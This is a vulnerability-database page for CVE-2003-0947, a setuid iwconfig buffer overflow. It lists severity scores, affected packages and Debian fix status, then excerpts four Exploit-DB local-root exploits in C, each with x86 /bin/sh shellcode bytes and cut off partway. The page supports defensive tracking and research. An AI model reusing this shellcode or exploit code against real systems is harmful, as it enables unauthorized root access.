CVE-2003-0947
Published 2003-12-15
Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable.
Priority: P423, high, 7.2 (CVSS 2.0)
AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.30% (66.8th percentile)
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wireless-tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
| wireless_tools_project | wireless_tools | — | — |
CVSS provenance
nvd: CVSS v2.0, 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_debian: 7.2 LOW
GHSA
GHSA-p4p9-5425-2328: Buffer overflow in iwconfig, when installed setuid, allows local users to execute arbitrary code via a long OUT environment variable
ghsa_unreviewed · 2022-04-29
CVE-2003-0947 [HIGH] CWE-120
Debian
CVE-2003-0947: wireless-tools - Buffer overflow in iwconfig, when installed setuid, allows local users to execut...
vendor_debian · 2003 · CVSS 7.2
CVE-2003-0947 [HIGH]
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Wireless Tools 26 (IWConfig) - Local Privilege Escalation
exploitdb · 2005-09-14
CVE-2003-0948
---
```c
// (if the iwconfig executable is setuid) /str0ke
#include
#include
#include
#include
/* 45 Byte /bin/sh >> http://www.milw0rm.com/id.php?id=1169 (https://www.exploit-db.com/exploits/1169/) */
char shellcode[]=
    "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
    "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
    "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
    "\x55\x89\xe5\x0f\x34";
int main(int argc,char **argv){
    char buf[96];
    long esp, *addr_ptr;
    unsigned long ret;
    int i, offset;
    unsigned long sp(void)
    { __asm__("movl %esp, %eax");}
    char *prog[]={argv[1],buf,NULL};
    char *env[]={"3v1lsh3ll0=",shellcode,NULL};
    if (argc >= 2) {
        printf("\n*********************************************\n");
        printf(" iwc
```
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)
exploitdb · 2003-11-11
CVE-2003-0947
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
```c
/*
Name: iw-config.c
Copyright: !sh2k+!tc2k
Author: heka
Date: 11/11/2003
Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS
Description: /sbin/iwconfig - local root exploit
iwconfig manipulate the basic wireless parameters
*/
#include
#define BIN "/sbin/iwconfig"
unsigned char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
    "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
    "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x8
```
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)
exploitdb · 2003-10-27
CVE-2003-0947
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
Exploit:
```c
/* PST_iwconfig
/sbin/iwconfig proof of concept exploit
coded by [email protected]
Ph4nt0m Security Team
http://www.ph4nt0m.net
just for fun
*/
#include
#include
#include
/* Copyright (c) Ramon de Carvalho Valle July 2003 */
/* x86/linux shellcode */
char shellcode[]= /* 24 bytes */
    "\x31\xc0" /* xorl %eax,%eax */
    "\x50" /* pushl %eax */
    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
    "\x89\xe3" /* movl %esp,%ebx */
    "\x50" /* push
```
Exploit-DB
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)
exploitdb · 2003-10-27
CVE-2003-0947
---
// source: https://www.securityfocus.com/bid/8901/info
A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges.
```c
/*
 * (C) 2003 NrAziz
 * polygrithm_at_hotmail[DOT]com
 */
/*
 * Greetz to Mixter,gorny,rave..
 */
/*
 * Description:
 * iwconfig configures a wireless network interface and is similar to ifconfig
 * except that iwconfig configures wireless interfaces.
 * Vulnerability:
 * Instead of giving the interface parameter when a large string is given
 * the buffer overflows :-)...
 */
/*
 * Yet another Proof Of Concept Xploit for 'iwconfig'
 */
#include
#include
#define BUFF_SIZE 98
#define RET 0xbffff
```
No writeups or analysis indexed.